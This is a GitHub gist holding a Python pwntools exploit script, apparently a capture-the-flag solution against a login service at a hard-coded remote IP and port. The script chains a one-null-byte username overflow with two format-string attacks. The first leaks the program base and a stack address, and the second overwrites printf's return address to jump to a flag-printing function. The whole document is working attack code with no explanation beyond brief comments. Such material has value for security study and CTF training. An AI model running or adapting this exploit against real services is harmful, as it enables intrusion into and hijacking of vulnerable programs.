Skip to content

Instantly share code, notes, and snippets.

@seanwupi

seanwupi/login.py Secret

Created Mar 29, 2015
Embed
What would you like to do?
#!/usr/bin/env python
from pwn import * # pip install pwntools
r = remote('202.112.26.107', 10910)
# one null byte overflow
r.recvuntil('Login: ')
r.send('guest\n')
r.recvuntil('Password: ')
r.send('guest123\n')
r.recvuntil('Your choice: ')
r.send('2\n')
r.recvuntil('Enter your new username:\n')
r.send('A'*256 + '\n')
r.recvuntil('Your choice: ')
r.send('4\n')
# fmt1: leak program base, stack address
r.recvuntil('Login: ')
r.send('%lx %48$lx '+ '\n')
r.recvuntil('Password: ')
r.send('\n')
tt = r.recvuntil('login failed.').split()
code_base = int(tt[0], 16) - 0x1490
print 'bin =', hex(code_base)
buf = int(tt[1], 16) - 528
retaddr = buf - 24
print 'printf_ret@stack = ', hex(retaddr)
# fmt2: overwrite the return address from printf() to show_flag(). Only lowest 2 bytes needed
show_flag = 0xFB3 + code_base
fs = ('%%%dc%%10$hn' % (show_flag&0xffff)).ljust(16) + p64(retaddr)
r.recvuntil('Login: ')
r.send(fs + '\n')
r.recvuntil('Password: ')
r.send('\n')
# receive lots of whitespace ..
r.recvuntil(p64(retaddr)[:6])
# receive flag
print r.recvuntil('\n')
r.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.